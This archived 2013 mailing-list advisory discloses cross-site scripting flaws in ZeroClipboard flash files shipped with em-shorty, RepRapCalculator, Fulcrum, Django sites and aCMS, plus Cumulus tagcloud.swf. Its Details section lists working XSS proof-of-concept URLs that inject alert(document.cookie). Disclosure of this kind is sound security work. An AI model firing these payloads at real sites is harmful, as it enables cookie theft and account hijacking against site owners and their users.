lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <002001ce16c6$c8032cb0$9b7a6fd5@pc>
Date: Fri, 1 Mar 2013 23:50:00 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <full-disclosure@...ts.grok.org.uk>
Subject: XSS vulnerabilities in em-shorty, RepRapCalculator,
	Fulcrum, Django and aCMS

Hello list!

I'm resending my letter from February 23, 2013 (since FD was not working
that day).

After my previous list of vulnerable software with ZeroClipboard.swf, here
is a list of software with ZeroClipboard10.swf. These are Cross-Site
Scripting vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django
and aCMS.

Earlier I've wrote about Cross-Site Scripting vulnerabilities in
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
that this is very widespread flash-file and it's placed at tens of thousands
of web sites. And it's used in hundreds of web applications. Among them are
em-shorty, RepRapCalculator, Fulcrum (CMS), Django and aCMS. And there are
many other vulnerable web applications with ZeroClipboard10.swf (some of
them also contain ZeroClipboard.swf).

-------------------------
Affected products:
-------------------------

Vulnerable are the next web applications with ZeroClipboard:

em-shorty 0.5.0 and previous versions.

RepRapCalculator.

Fulcrum - all versions of this CMS.

Django - there are multiple web sites on Django framework (particularly
Django 1.3.1 and Djangoplicity) with ZeroClipboard.

aCMS 1.0.

Both XSS vulnerabilities in ZeroClipboard are fixed in latest version (by
new developers) ZeroClipboard 1.1.7. All developers should update swf-file
in their software.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into clipboard (as
described in the first advisory).

em-shorty:

http://site/public/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

RepRapCalculator:

http://site/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Fulcrum:

http://site/admin/lib/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Django (different web applications on Django framework):

Django 1.3.1:

http://site/media/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/media/js/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Djangoplicity:

http://site/static/djangoplicity/js/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/static/js/ZeroClipboard10.swfZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

aCMS:

http://site/assets/swf/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Besides ZeroClipboard, in aCMS there is also Cumulus (tagcloud.swf),
vulnerabilities in which I've disclosed (and part of them was fixed) already
in 2009. About it you can read in the article XSS vulnerabilities in 34
millions flash files
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html)

http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ